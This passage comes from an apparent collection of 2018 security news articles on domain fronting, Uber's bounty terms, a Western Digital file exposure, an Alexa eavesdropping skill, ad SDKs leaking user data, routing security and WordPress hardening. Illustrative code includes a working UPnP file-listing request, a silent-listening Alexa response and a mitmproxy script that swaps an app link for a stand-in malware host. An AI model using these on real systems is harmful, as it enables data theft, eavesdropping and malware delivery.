While such behavior is normal and expected in some circumstances – browsers re-use persistent connections for domains listed in the same SSL certificate – some use the method to evade restrictions and blocks imposed at the TLS/SSL layer. The technique can’t be used to impersonate domains, however, and the clients involved are non-standard, working around the usual TLS/SSL checks.
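At the protocol level, the trick looks roughly like the sketch below: the TLS layer names one host while the HTTP request inside names another. Both hostnames are invented for illustration.

```typescript
// Sketch of domain fronting mechanics using Node's https module.
// The TLS SNI names one host; the inner HTTP Host header names another.
import https from "node:https";

const req = https.request(
  {
    host: "allowed-front.example.com",       // where the TCP/TLS connection goes
    servername: "allowed-front.example.com", // SNI visible to network filters
    path: "/",
    headers: { Host: "hidden-service.example.com" }, // the real destination
  },
  (res) => res.pipe(process.stdout)
);
req.end();
```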

“Although these cases are also already handled as a breach of our AWS Terms of Service, in the coming weeks we will be checking that the account that owns the certificate we serve for a particular connection always matches the account that owns the request we handle on that connection. As ever, the security of our customers is our top priority, and we will continue to provide enhanced protection against misconfigurations and abuse from unrelated parties,” Amazon says.

Threat actors have been observed using domain fronting to hide malicious traffic, as have legitimate communication services looking to bypass censorship.

Several weeks ago, news broke that Google is making changes to its infrastructure to no longer support domain fronting (which was never officially supported, it seems). According to Access Now, many human rights-enabling technologies relying on Google’s commitment to protecting human rights could be affected by the change.


Uber Updates Bug Bounty Program
30.4.2018 securityweek Security


Uber last week updated the legal terms of its bug bounty program and provided guidance for good faith vulnerability research. The changes come just months after the ride-sharing giant admitted paying a couple of individuals as part of an effort to cover up a massive security incident.

Uber says it has addressed nearly 200 flaws for which it has awarded more than $290,000 since August 2017, bringing the total paid out by the company since the launch of its bug bounty program to over $1.4 million.

The new terms provide more specific guidance on what is and what is not acceptable conduct in terms of vulnerability research. Bug bounty hunters are now also provided clearer instructions on what to do if they come across user data during their investigations.

Researchers acting in good faith are informed that Uber will not initiate or recommend legal action against them. Furthermore, if a third party files a lawsuit, the company has promised to let them know that the activities were conducted in compliance with its program.

These changes are similar to ones announced recently by Dropbox, which has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.”

These updates come just months after Uber admitted suffering a data breach that resulted in the information of 57 million riders and drivers, including 25 million individuals located in the United States, being taken from the company’s systems in 2016.

Uber’s security team was contacted in November 2016 by an individual who claimed to have accessed Uber data and demanded a six-figure payment. This individual and an accomplice had found the data in an Amazon Web Services (AWS) S3 bucket used for backup purposes.

After confirming the claims, the ride-sharing firm decided to pay the hackers $100,000 through its HackerOne-based bug bounty program to have them destroy the data.

Uber CISO John Flynn admitted during a Senate hearing in February that it was wrong not to disclose the breach earlier, and admitted that the company should not have used its bug bounty program to deal with extortionists.

On its HackerOne page, Uber now tells researchers, “Don’t extort us. You should never illegally or in bad faith leverage the existence of a vulnerability or access to sensitive or confidential information, such as making extortionate demands or ransom requests or trying to shake us down. In other words, if you find a vulnerability, report it to us with no conditions attached.”

A code of conduct added by HackerOne to its disclosure guidelines shortly after news broke that Uber used the platform to pay off hackers includes an entry on extortion and blackmail, prohibiting “any attempt to obtain bounties, money or services by coercion.” It’s unclear if the code of conduct came in response to the Uber incident, but the timing suggested that it may have been.

Uber typically pays between $500 and $10,000 for vulnerabilities found in resources covered by its bug bounty program, but the company has paid out up to $20,000 for serious issues.

Uber has informed white hat hackers that they can now earn an additional $500 if their vulnerability report includes a “fully scripted” proof-of-concept (PoC).

The company also announced the launch of a pilot program in which bounties donated to a charity through HackerOne will be matched. Donations will initially be matched up to a total of $100,000, but the program may be expanded once that milestone is reached.


Western Digital Cloud Storage Device Exposes Files to All LAN Users
27.4.2018 securityweek  Security

The default configuration on the new Western Digital My Cloud EX2 storage device allows any users on the network to retrieve files via HTTP requests, Trustwave has discovered.

WD’s My Cloud represents a highly popular storage/backup device option, allowing users to easily backup important data (including documents, photos, and media files) and store it on removable media.

The new drive, however, exposes data to any unauthenticated local network user, because of a Universal Plug and Play (UPnP) media server that the device automatically starts when powered on.

By default, it allows any users capable of sending HTTP requests to the drive to grab any files from the device. Thus, any permissions or restrictions set by the owner or administrator are completely bypassed, Trustwave’s security researchers warn.

“It is possible to access files on the storage even when Public shares are disabled. Specifically, anyone can issue HTTP requests to TMSContentDirectory/Control on port 9000 passing various actions. The Browse action returns XML with URLs to individual files on the device,” the security firm explains in an advisory.

The researchers also published a proof-of-concept, explaining that an attacker needs to include XML with a Browse action in an HTTP request to port 9000, asking for the TMSContentDirectory/Control resource. This results in the UPnP server responding with a list of files on the device.

Next, the attacker can use HTTP requests to fetch the actual files from the device, given that they are already in possession of the URLs leading to those files (from the response collected in the previous step).
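Based on the advisory's description, the request boils down to a standard UPnP SOAP call, sketched below. The path and port come from the article; the device's LAN address is illustrative, and Node 18+ is assumed for the global fetch.

```typescript
// Hedged sketch of the unauthenticated UPnP ContentDirectory "Browse"
// request described above. The SOAP envelope is the standard UPnP form;
// the LAN address is illustrative.
const host = "http://192.168.1.50:9000";

const soapBody = `<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
      <ObjectID>0</ObjectID>
      <BrowseFlag>BrowseDirectChildren</BrowseFlag>
      <Filter>*</Filter>
      <StartingIndex>0</StartingIndex>
      <RequestedCount>100</RequestedCount>
      <SortCriteria></SortCriteria>
    </u:Browse>
  </s:Body>
</s:Envelope>`;

const res = await fetch(`${host}/TMSContentDirectory/Control`, {
  method: "POST",
  headers: {
    "Content-Type": 'text/xml; charset="utf-8"',
    SOAPAction: '"urn:schemas-upnp-org:service:ContentDirectory:1#Browse"',
  },
  body: soapBody,
});

// The response XML lists file URLs that can then be fetched directly,
// bypassing any share permissions set by the owner.
console.log(await res.text());
```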

Unfortunately, there is no official fix to address the vulnerability. WD was informed of the issue in January, but the company said it wouldn’t release a patch.

The My Cloud content can be accessed from the local network when Twonky DLNA Media Server is enabled because the server does not support authentication and is broadcast to any DLNA client without any authentication mechanism.

To ensure their data remains protected, users should keep sensitive data in a password-protected My Cloud Share. They are also advised to disable the Twonky DLNA Media Server for the entire My Cloud, or to disable Media Serving for Shares containing sensitive data.

Instructions on how to disable Twonky DLNA Media Server are available in this knowledge base article.


Hacking the Amazon Alexa virtual assistant to spy on unaware users
27.4.2018 securityaffairs Security

Checkmarx experts created a proof-of-concept Amazon Echo Skill for Alexa that instructs the device to eavesdrop on users’ conversations and then sends the transcripts to a website controlled by the attackers.
The Alexa virtual assistant could be abused by attackers to spy on consumers with smart devices.

Researchers at security firm Checkmarx created a proof-of-concept Amazon Echo Skill for Alexa that instructs the device to indefinitely record surrounding audio, secretly eavesdropping on users’ conversations, and then sends the transcripts to a website controlled by the attackers.

Amazon allows developers to build custom Skills that can control voice-activated smart devices such as Amazon Echo Show, Echo Dot, and Amazon Tap.

The rogue Echo Skill for Alexa is disguised as a simple math calculator, once installed it will be activated in the background after a user says “Alexa, open calculator.”

“The Echo is continuously listening for the user’s voice. So when the user says “Alexa, open calculator”, the calculator skill is initialized and the API\Lambda-function that’s associated with the skill receives a launch request as an input.” reads the report published by Checkmarx.


The experts at Checkmarx were able to build a feature that kept the Alexa session up so Alexa would continue listening and customers were not able to detect Alexa’s activity.

The experts manipulated the shouldEndSession flag in the skill’s JavaScript code, which is normally used to halt the device from listening if it doesn’t receive voice commands.

“The combination of a session that is still open (shouldEndSession=false) and an un-noticeable (empty) reprompt with a record intent as described above is that even after the user ends the regular functionality of the skill (math calculation within the calculator), the skill will continue to record, will capture the spoken words and send them to a log.” continues the report.

“As long as it will recognize speech and will pick up words, the eavesdropping will continue. Even the default 8-second grace of Alexa prior to closing the skill (in case of silence) will be doubled to 16 seconds due to a silence re-prompt.”
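The mechanism lives in the skill's response JSON. Below is a sketch of the response shape described, following the public Alexa Skills Kit response format; the speech text is illustrative.

```typescript
// Sketch of the skill response described above (Alexa Skills Kit JSON format).
// shouldEndSession=false keeps the session (and microphone) open, and an
// empty SSML reprompt produces no audible cue after the silence timeout.
const response = {
  version: "1.0",
  response: {
    outputSpeech: { type: "PlainText", text: "Two plus two is four." },
    reprompt: { outputSpeech: { type: "SSML", ssml: "<speak></speak>" } },
    shouldEndSession: false,
  },
};
console.log(JSON.stringify(response, null, 2));
```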

Checkmarx published a video proof-of-concept to show that Alexa can spy on users once they have opened a session with the calculator app. A second session is created without alerting the user that the microphone is still active.

Any recorded audio is transcribed, and the transcripts are then sent to the attackers. Checkmarx reported its findings to Amazon, which addressed the problem on April 10.

In November 2017, researchers at security firm Armis reported that millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, were affected by the Blueborne vulnerabilities.

Virtual assistants are powerful technologies, but they dramatically enlarge our attack surface; for this reason, it is essential to develop them with a security-by-design approach.


Leaking ads
24.4.18 Kaspersky  Security
When we use popular apps with good ratings from official app stores we assume they are safe. This is partially true – usually these apps have been developed with security in mind and have been reviewed by the app store’s security team. However, we found that because of third-party SDKs many popular apps are exposing user data to the internet, with advertising SDKs usually to blame. They collect user data so they can show relevant ads, but often fail to protect that data when sending it to their servers.

During our research into dating app security, we found that some analyzed apps were transmitting unencrypted user data through HTTP. It was unexpected behavior because these apps were using HTTPS to communicate with their servers. But among the HTTPS requests there were unencrypted HTTP requests to third-party servers. These apps are pretty popular, so we decided to take a closer look at these requests.

HTTP request with unencrypted user data

One of the apps was making POST requests to the api.quantumgraph[.]com server. By doing so it was sending an unencrypted JSON file to a server that is not related to the app developers. In this JSON file we found lots of user data, including device information, date of birth, user name and GPS coordinates. Furthermore, this JSON contained detailed information about app usage that included information about profiles liked by the user. All this data was sent unencrypted to the third-party server and the sheer volume makes it really scary. This is due to the use of a qgraph analytics module.

Unencrypted user data sent by app

Two other dating apps from our research were basically doing the same. They were using HTTPS to communicate with their servers, but at the same time there were HTTP requests with unencrypted user data being sent to a third-party server. This time it was another server belonging not to an analytics company but to an advertising network used by both dating apps. Another difference was GET HTTP requests with user data being used as parameters in a URL. But in general these apps were doing the same thing – transmitting unencrypted user data to third-party servers.

List of HTTP requests from advertising SDK

At this point it already looked bad, so I decided to check my own device, collecting network activity for one hour. It turned out to be enough to identify unencrypted requests with my own data. And again the cause of these requests was a third-party SDK used by a popular app. It was transmitting my location, device information and token for push messages.

HTTP request from my device with my own unencrypted data

So I decided to take a look at those dating apps with the leaking SDKs to find out why it was happening. It came as no surprise that these apps used more than one third-party module – in fact, every app contained at least 40 different modules. They make up a huge part of these apps – at least 75% of the Dalvik bytecode was in third-party modules; in one app the proportion of third-party code was as high as 90%.

List of modules from analyzed dating apps

Developers often use third-party code to save time and make use of existing functionality. This makes perfect sense and allows developers to focus on their own ideas instead of working on something that has already been developed many times before. However, this means developers are unlikely to know all the details of the third-party code used and it may contain security issues. That’s what happened with the apps from our research.

Getting results
Knowing that there are popular SDKs exposing user data and that almost every app uses several SDKs, we decided to search for more of these apps and SDKs. To do so we used network traffic dumps from our internal Android sandbox. Since 2014 we have collected network activities from more than 13 million APKs. The idea is simple – we install and launch an app and imitate user activity. During app execution we collect logs and network traffic. There is no real user data, but to the app it looks like a real device with a real user.

We searched for the two most common HTTP request methods – GET and POST. In GET requests the user data is usually part of the URL parameters, while in POST requests it sits in the Content field of the request rather than the URL. In our research, we looked for apps transmitting unencrypted user data using at least one of these methods, though many were exposing user data in both.

We were able to identify more than 4 million APKs exposing some data to the internet. Some of them were doing it because their developers had made a mistake, but most of the popular apps were exposing user data because of third-party SDKs. For each type of request (GET or POST) we extracted the domains where apps were transmitting user data. Then we sorted these domains by app popularity – how many users had these apps installed. That’s how we identified the most popular SDKs leaking user data. Most of them were exposing device information, but some were transmitting more sensitive information like GPS coordinates or personal information.
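
In practice the search boils down to string matching over the recorded requests: look for known identifier fields in the URL query of GET requests and in the body of POST requests. A minimal sketch of the idea in Python (the field names and log format are simplified assumptions, not our actual pipeline):

    from urllib.parse import urlparse, parse_qs

    # Parameter names that suggest user data is being transmitted (hypothetical list).
    PII_KEYS = {'imei', 'imsi', 'mac', 'lat', 'lon', 'email', 'android_id'}

    def leaked_fields(method, url, body=''):
        # Return PII-like parameter names found in a plain-text HTTP request.
        if method == 'GET':
            params = parse_qs(urlparse(url).query)   # user data in URL parameters
        else:
            params = parse_qs(body)                  # user data in the POST body
        return PII_KEYS & {k.lower() for k in params}

    # Example: a GET request leaking coordinates and the IMEI as URL parameters.
    print(leaked_fields('GET', 'http://ads.example.com/v1?lat=55.7&lon=37.6&imei=0123'))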

Four most popular domains where apps were exposing sensitive data through GET requests
mopub.com
This domain is part of a popular advertising network. It was used by the two dating apps mentioned at the beginning of this article. We found many more popular apps with this SDK – at least five of them have more than 100 million installations according to the Google Play Store, and many others have millions of installations.

It transmits the following data in unencrypted form:

device information (manufacturer name, model, screen resolution)
network information (MCC, MNC)
package name of the app
device coordinates
Key words

HTTP request with user data in URL

Key words are the most interesting part of the transmitted data. They can vary depending on app parameter settings. In our data there was usually some personal information like name, date of birth and gender. Location needs to be set by an app too – and usually apps provide GPS coordinates to the advertising SDK.

We found several different versions of this SDK. The most common version was capable of using HTTPS instead of HTTP. But HTTPS has to be enabled by the app developers, and according to our findings they mostly didn’t bother, leaving the default value of HTTP in place.

Advertising SDK using HTTP by default
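
The pattern is easy to picture with a hypothetical SDK interface (for illustration only – this is not the vendor’s actual API): unless the integrating developer explicitly opts in, every ad request goes out over plain HTTP.

    class AdRequestBuilder:
        # Hypothetical ad SDK with an opt-in HTTPS flag and an insecure default.
        def __init__(self, use_https=False):
            self.scheme = 'https' if use_https else 'http'

        def build(self, host, params):
            query = '&'.join(f'{k}={v}' for k, v in params.items())
            return f'{self.scheme}://{host}/ad?{query}'

    # A developer who never touches the flag ships the insecure default:
    print(AdRequestBuilder().build('ads.example.com', {'lat': '55.7', 'lon': '37.6'}))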

rayjump.com
This domain is also part of a popular advertising network. We found two apps with more than 500 million installations, seven apps with more than 100 million installations and many others with millions of installations.

It transmits the following data:

device information (manufacturer name, model, screen resolution, OS version, device language, time zone, IMEI, MAC)
network information (MCC, MNC)
package name of the app
device coordinates
We should mention that while most of this data was transmitted in plain text as URL parameters, the coordinates, IMEI and MAC address were encoded with Base64. We can’t say they were protected, but at least they weren’t in plain text. We were unable to find any versions of this SDK where it’s possible to use HTTPS – all versions had HTTP URLs hardcoded.

Advertising SDK collects device location
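
It is worth stressing that Base64 is an encoding, not encryption: anyone who intercepts the request can reverse it in one line, no key required. A quick sketch (the coordinate value is made up):

    import base64

    # Coordinates as an SDK might embed them in a URL parameter.
    encoded = base64.b64encode(b'55.751244,37.618423').decode()
    print(encoded)                             # looks opaque, but is not protected
    print(base64.b64decode(encoded).decode())  # 55.751244,37.618423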

tapas.net
Another popular advertising SDK that collects the same data as the others:

device information (manufacturer name, model)
network operator code
package name of the app
device coordinates
We found seven apps with more than 10 million installations from Google Play Store and many other apps with fewer installations. We were unable to find any way for the developers to switch from HTTP to HTTPS in this SDK either.

appsgeyser.com
The fourth advertising SDK is appsgeyser, and it differs from the others in that it is actually a platform for building apps. It allows people who don’t want to develop an app themselves to simply generate one. And the generated app will contain an advertising SDK that sends user data in HTTP requests. So these apps are effectively produced by the service itself rather than by independent developers.

They transmit the following data:

device information (manufacturer name, model, screen resolution, OS version, android_id)
network information (operator name, connection type)
device coordinates
We found a huge number of apps that have been created with this platform and are using this advertising SDK, but most of them are not very popular – the most popular have just tens of thousands of installations. Still, there really are lots of these apps.

Screenshot of appsgeyser.com

According to the appsgeyser.com web page there are more than 6 million apps with almost 2 billion installations between them. And they showed almost 200 billion ads – probably all via HTTP.

Four most popular domains where apps were exposing sensitive data through POST requests
ushareit.com
All the apps posting unencrypted data to this server were created by the same company, so in this case the leak is not caused by third-party code. But these apps are very popular – one of them has been installed more than 500 million times from the Google Play Store. These apps collect a large amount of device information:

manufacturer name
model
screen resolution
OS version
device language
country
android_id
IMEI
IMSI
MAC

Device information collected by the app

This unencrypted data is then sent to the server. Furthermore, among the data they are uploading is a list of supported commands – one of them is to install an app. The list of commands is transmitted in plain text and the answer from the server is also unencrypted. This means it can be intercepted and modified. What is even worse about this functionality is that the app can silently install a downloaded app. The app just needs to be a system app or have root rights to do so.

Fragment of code related to the silent installation of apps upon command from the server

Lenovo
Here is another example of popular apps leaking user data not because of third-party code but because of a mistake by developers. We found several popular Lenovo apps collecting and transmitting unencrypted device information:

IMEI
OS version
language
manufacturer name
model
screen resolution

HTTP request with unencrypted device information

This information is not very sensitive. But we found several Lenovo apps that were sending more sensitive data in unencrypted form, such as GPS coordinates, phone number and email.

App code for the collection of device coordinates and other data

We reported these issues to Lenovo and they fixed everything.

nexage.com
This domain is used by a very popular advertising SDK. There are tons of apps using it. One of them even has more than 500 million installations and seven other apps have more than 100 million installations. Most of the apps with this SDK are games. There are two interesting things about this SDK – the transmitted data and the protocol used.

This SDK sends the following data to the server:

device information (screen resolution, storage size, volume, battery level)
network information (operator name, IP address, connection type, signal strength)
device coordinates
It also sends information about hardware availability:

Front/rear camera availability
NFC permission
Bluetooth permission
Microphone permission
GPS coordinates permission

Advertising SDK that collects information about device hardware features

It may also send some personal information, such as age, income, education, ethnicity, political view, etc. There’s no magic involved – the SDK has no way of finding this information unless the apps that are using this SDK provide it. We have yet to see any app providing these details to the SDK, but we think users should be aware of the risks when entering such details to apps. The information could be passed on to the SDK and the SDK could expose it to the internet.

Advertising SDK could send personal information

The second interesting thing about this SDK is that it uses HTTPS to transmit data, but usually only for the initial communication. After that it may receive new configuration settings from the server that specify an HTTP URL. At least that’s what happened on my device, and on several occasions with different apps on our test devices.

HTTPS URL in advertising SDK

quantumgraph.com
Another SDK that is leaking data uses the quantumgraph.com domain. This is an analytics SDK, not an advertising one. We found two apps with more than 10 million installations from Google Play Store and another seven apps with more than a million installations. More than 90% of detected users with this SDK were from India.

This SDK posts JSON files with data via HTTP. The data may vary from app to app because it’s an analytics SDK and it sends information provided by the app. In most cases, the following items are among the sent data:

Device information
Personal information
Device coordinates
App usage

List of installed apps sent in unencrypted form to the server

In the case of the dating app, there were likes, swipes and visited profiles – all user activity.

App usage was sent in unencrypted form to the server

This SDK was using a hardcoded HTTP URL, but after our report they created a version with an HTTPS URL. However, most apps are still using the old HTTP version.

Other SDKs
Of course, there are other SDKs using HTTP to transmit user data, but they are less popular and almost identical to those described above. Many of them expose device locations, while some also expose emails and phone numbers.

Phone number and email collected by an app to be sent via HTTP

Other findings
During our research, we found many apps that were transmitting unencrypted authentication details via HTTP. We were surprised to discover how many apps are still using HTTP to authenticate their services.

Unencrypted request with authentication token

They weren’t always transmitting user credentials – sometimes the credentials were for the app’s own services, such as databases. Protecting those services with credentials makes little sense when the credentials themselves are exposed to the internet. Such apps usually transmit authentication tokens, but we saw unencrypted logins and passwords too.

Unencrypted request with credentials

Malware
Digging into an HTTP request with unencrypted data allowed us to discover a new malicious site. It turns out that many malicious apps also use HTTP to transmit user data. And in the case of malware it is even worse, because malware can steal more sensitive data like SMSs, call history, contacts, etc. Malicious apps not only steal user data but expose it to the internet, making it available for others to exploit and sell.

Leaked data
In this research we analyzed the network activity of more than 13 million APK files in our sandbox. On average, approximately every fourth app with network communications was exposing some user data. The fact that there are some really popular apps transmitting unencrypted user data is significant. According to Kaspersky Lab statistics, on average every user has more than 100 installed apps, including system and preinstalled apps, so we presume most users are affected.

In most cases these apps were exposing:

IMEI, the International Mobile Equipment Identity (a unique phone hardware ID), which users can’t reset unless they change their device.
IMSI, the International Mobile Subscriber Identity (a unique SIM card ID), which users can’t reset unless they change their SIM card.
Android ID – a number randomly generated during the phone’s setup, which users can change by resetting their device to factory settings. From Android 8 onwards, a different random value is generated for every combination of app, user and device.
Device information such as the manufacturer, model, screen resolution, system version and app name.
Device location.
Some apps expose personal information, mostly the user’s name, age and gender, but it can even include the user’s income. Their phone number and email address can also be leaked.

Why is it wrong?
Because this data can be intercepted. Anyone can intercept it on an unprotected Wi-Fi connection, the network owner could intercept it, and your network operator could find out everything about you. Data will be transmitted through several network devices and can be read on any of them. Even your home router can be infected – there are many examples of malware infecting home routers.

Without encryption this data is exposed as plain text and can simply be extracted from the requests. The IMSI and IMEI are especially valuable for tracking: they only change when you replace both the SIM card and the device at the same time, so anyone who knows them can link the rest of your leaking data together across different sources.

Furthermore, HTTP data can be modified. Someone could change the ads being displayed or, even worse, change the link to an app. Because some advertising networks promote apps and ask users to install them, it could result in malware being downloaded instead of the requested app.

Apps can intercept HTTP traffic and bypass the Android permission system. Android uses permissions to protect users from unexpected app activity: apps must declare what access they will need. Starting from Android 6, all permissions have been divided into two groups – normal and dangerous. If an app needs a dangerous permission, it has to ask the user for it at runtime, not just before installation. So, to get the location, the app needs to ask the user to grant access. And to read the IMEI or IMSI the app also needs to ask the user for access, because these are classified as dangerous permissions.

But an app can add a proxy to the Wi-Fi settings and read all the data being transmitted by other apps. To do so it needs to be a system app or be provisioned as the Profile or Device Owner. Alternatively, an app can set up a VPN service on the device and route user data through its own server. After that, the app can learn the device’s location without ever requesting location access, just by reading other apps’ HTTP requests.
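
Both reading and tampering are trivial once plaintext traffic flows through such a proxy. A rough sketch using the mitmproxy addon API (the domains, parameter names and file names are hypothetical) shows how little code either attack takes:

    from mitmproxy import http

    def request(flow: http.HTTPFlow) -> None:
        # Read location data straight out of an unencrypted request's URL.
        if flow.request.scheme == 'http':
            q = flow.request.query
            if 'lat' in q and 'lon' in q:
                print('leaked location:', q['lat'], q['lon'])

    def response(flow: http.HTTPFlow) -> None:
        # Tamper with an unencrypted ad response: swap the promoted app's URL.
        if flow.request.scheme == 'http' and flow.response.text:
            flow.response.text = flow.response.text.replace(
                'http://cdn.example.com/app.apk',
                'http://evil.example.com/malware.apk')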

Future

HTTP (blue) and HTTPS (orange) usage in apps since March 2014

Starting from the second half of 2016, more and more apps have been switching from HTTP to HTTPS. So, we are moving in the right direction, but too slowly. As of January 2018, 63% of apps are using HTTPS but most of them are still also using HTTP. Almost 90% of apps are using HTTP. And many of them are transmitting unencrypted sensitive data.

Advice for developers
Do not use HTTP. It exposes user data, which is really bad.
Turn on 301 redirection to HTTPS for your frontends (see the sketch after this list).
Encrypt data, especially if you have to use HTTP. Asymmetric cryptography works great for this.
Always use the latest version of an SDK, even if it means additional testing before the release. This is really important, because security issues may have been fixed. From what we have seen, many apps do not update third-party SDKs and keep using outdated versions instead.
Check your app’s network communications before publishing. It won’t take more than a few minutes, but you will find out whether any of your SDKs are switching from HTTPS to HTTP and exposing user data.
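
For the redirection advice above, most frameworks make this a one-line change. A minimal sketch for a Django backend (assuming Django’s standard SecurityMiddleware is enabled):

    # settings.py - force all plain-HTTP requests over to HTTPS
    SECURE_SSL_REDIRECT = True      # SecurityMiddleware issues permanent redirects
    SESSION_COOKIE_SECURE = True    # never send the session cookie over HTTP
    CSRF_COOKIE_SECURE = True       # same for the CSRF cookie
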
Advice for users
Check your app permissions. Do not grant access to something if you don’t understand why. Most apps do not need access to your location. So don’t grant it.
Use a VPN. It will encrypt the network traffic between your device and external servers. The traffic will remain unencrypted beyond the VPN provider’s servers, but at least it’s an improvement.


Internet Society Calls on IXPs to Help Solve Internet Routing Problems
23.4.2018 securityweek Security

The Internet Society is expanding its Mutually Agreed Norms for Routing Security (MANRS) initiative from just autonomous systems (AS) networks to include internet exchange points (IXPs).

With its purpose to bring basic security to internet routing, MANRS was launched in 2014 with 9 founding members. Since its launch it has grown to 56 members, out of a total of around 60,000 ASs on the internet. Andrei Robachevsky, the Internet Society's technology program manager, told SecurityWeek that the immediate target is between 700 and 800 actively conforming members. Since about 80% of all networks are stub networks with no knowledge of other networks, Robachevsky believes that 700 or 800 of the remaining networks will be enough to provide the tipping point necessary to seriously improve internet routing security.

It is currently a major problem. Each AS 'announces' its customers to other networks so that traffic can reach its intended destination. The protocol used is border gateway protocol (BGP) -- but this was developed in the mid-1990s for resilience, simplicity and ease of deployment. It has no built-in security of its own. There is nothing in the protocol to tell one network that what it hears from another network is true or false. There are out-of-band authoritative databases that can verify the information, but since this data is incomplete, it is not often used.

This basic lack of routing verification between different ASs is the root cause of both accidental and malicious internet routing problems. There are three primary issues: route hijacking, IP Address spoofing, and route leaks -- and it is worth noting that there were 14,000 internet routing issues in 2017 alone.

The classic example of route hijacking occurred in 2008, when YouTube became unavailable for around 2 hours. It is often said that this was an intentional accident: the intent existed, but the full effect wasn't expected. Pakistan Telecom announced that YouTube was a customer. Without verifying this announcement, its upstream provider PCCW forwarded the announcement to the rest of the world. The result was that all traffic intended for YouTube was instead sent to Pakistan Telecom.

In April 2017, Robachevsky wrote in an Internet Society blog, "Large chunks of network traffic belonging to MasterCard, Visa, and more than two dozen other financial services companies were briefly routed through a Russian telecom. For several minutes, Rostelecom was originating 50 prefixes for numerous other Autonomous Systems, hijacking their traffic."

IP address spoofing can be used for different malicious purposes. One of the most dramatic is a reflection/amplification DDoS attack. The attacker spoofs the address of the target, and then uses amplification and reflection to direct large amounts of data at the victim. This year, memcached has been used to amplify DDoS attacks sufficient to set new records -- first at 1.3Tbps and then within days at 1.7Tbps.

If a sufficient number of ASs adopt the MANRS principles, then reflection/amplification DDoS attacks will simply cease to be a problem because address spoofing will be recognized and refused.
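
The anti-spoofing part of MANRS comes down to source-address validation at the network edge: a provider only accepts packets from a customer link if the source address belongs to prefixes that customer legitimately announces. A conceptual sketch in Python, with hypothetical prefixes:

    import ipaddress

    # Prefixes this customer legitimately announces (hypothetical).
    CUSTOMER_PREFIXES = [ipaddress.ip_network('203.0.113.0/24')]

    def accept_packet(src_ip: str) -> bool:
        src = ipaddress.ip_address(src_ip)
        return any(src in net for net in CUSTOMER_PREFIXES)

    print(accept_packet('203.0.113.10'))  # True  - legitimate source address
    print(accept_packet('198.51.100.7'))  # False - spoofed, packet is dropped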

Route leaks can occur when a network accidentally announces the wrong information. Dyn described an example in 2014. "When a transit customer accidentally announces the global routing table back to one of its providers, things get messy. This is what happened earlier today and it had far-reaching consequences." In this instance it caused disruptions in traffic "in places as far-flung from the USA as Pakistan and Bulgaria."

MANRS seeks to get network providers to comply with just four basic principles: to filter announcements to ensure their accuracy; to prevent IP address spoofing; to improve coordination between networks; and for each network to ensure that its own part of the global validation network is accurate. The problem now is for the Internet Society to expand the MANRS community membership from just 56 to the 700 or 800 -- Robachevsky's tipping-point -- to really make a difference.

To achieve this, the Internet Society has today launched the MANRS IXP program with ten founding IXP members. The hope is that IXPs -- some of which have as many as 600 ASs connecting with them -- will contribute directly to improving routing security while also acting as ambassadors for the program.

"If we can get them on board as ambassadors to promote MANRS within their communities," commented Robachevsky, "it becomes a great way to scale up. But they can also tangibly contribute to routing security. They run so-called route servers. Instead of asking everyone to connect to everyone, each of their members can just connect to the IXP's proxy network for routing information. This means that the route server itself can do the validation since each route server already knows its user networks. Filters installed here can recognize misconfigured or false announcements and can just drop incorrect announcements. If this happens, we're creating a very secure peering environment which is a big step to overall internet routing security."

The difficulty for the Internet Society is that signing up to MANRS -- either as an individual AS or as an IXP -- does nothing to protect the member directly. It helps to protect other networks, and each network is really reliant on other networks protecting them. To make it as easy as possible for IXPs to join the program, there are only three requirements: two essential requirements and at least one from three optional requirements.

The essential commitments are to facilitate the prevention of the propagation of incorrect routing information, and to promote MANRS to the IXP's own membership. The three optional commitments (each IXP must commit to at least one of them) are, to protect the peering platform, to facilitate global operational communication and coordination between network operators, and to provide monitoring and debugging tools to members.

"The founding participants of the MANRS IXP Program understand the importance of having a more resilient and secure Internet routing system," said Robachevsky. "The IXP community is integral to the Internet ecosystem and by joining MANRS, they are joining a community of security-minded network operators committed to making the global routing infrastructure more secure."

If PCCW had implemented MANRS, then the Pakistan Telecom hijack of YouTube could not have happened. If PCCW had not implemented MANRS, but IXPs had done so, then the hijack would have been stopped at the peering points.


Take These Steps to Secure Your WordPress Website Before It’s Too Late
23.4.2018 securityaffairs  Security

You might have heard that WordPress security is often referred to as “hardening.” While the name might cause a few eyebrows to raise, overall, it makes sense. To clarify, the process of adding security layers is similar to boosting the reinforcements to your home, castle, or fort. In other words, WordPress website security is all about putting locks on doors and windows and having lookouts on each of your “towers.”

While this may be all good, what can you genuinely do to improve your website’s security – at the same time giving your readers and customers the guarantee that their sensitive information won’t fall into the wrong hands?

WordPress website security

1. Perform all WordPress updates
Although it may seem unlikely that something as simple as keeping up with updates would make any difference, in actuality it has a considerable impact. This means that whenever you log in and see the “Update Available” notification, you should make time to click it. Of course, this is where having regular backups will also give you peace of mind that nothing will be broken at the end of the process.

2. Add Two-Step Authentication
Another excellent way to prevent brute-force attacks on your site is to set up a much-needed two-step authentication process. If you have it for your Gmail or Yahoo account, then you should definitely have it for a website which could be used by hundreds or more users.

The two-step measure means that, in addition to your password, you’ll be asked to input a code sent to your phone or email. Often, the second login code is sent via SMS, but you can change that to suit your preferences.

You also have the option of adding different plug-ins, including Google Authenticator, Clef, or Duo Two-Factor Authentication.

3. Panic Button: Website Lockdown
The lockdown feature is commonly enabled when multiple failed login attempts are made, which can help against pesky and persistent brute force attempts. In this case, whenever a hacker tries to input the wrong password multiple times, the website shuts down and displays an “error” message – all while you get notified of this unauthorized activity.

Again, there are different plug-ins you can use; one of our favorites is iThemes Security – with it, you can specify a certain number of failed login attempts after which the system bans the attacker’s IP address.

4. Use Your Email to Login
When trying to sign in, you have to enter a username. Our recommendation is to use an email ID instead of a username, since usernames are easier to predict and hack. Plus, WordPress website accounts require a unique email address, which adds another layer of security.

5. Use SSL To Encrypt Data
SSL, otherwise known as Secure Sockets Layer, is a smart way of securing the admin panel yourself – making sure that the transfer of data between the server and users is safe.

Overall, this measure makes it hard for hackers to breach the connection or spoof your info, and the best part is that getting an SSL certificate for your WordPress website is a piece of cake. While you can separately purchase one from a dedicated company, you can also ask your hosting solution to provide you with one – it may even be an option that comes with their package.

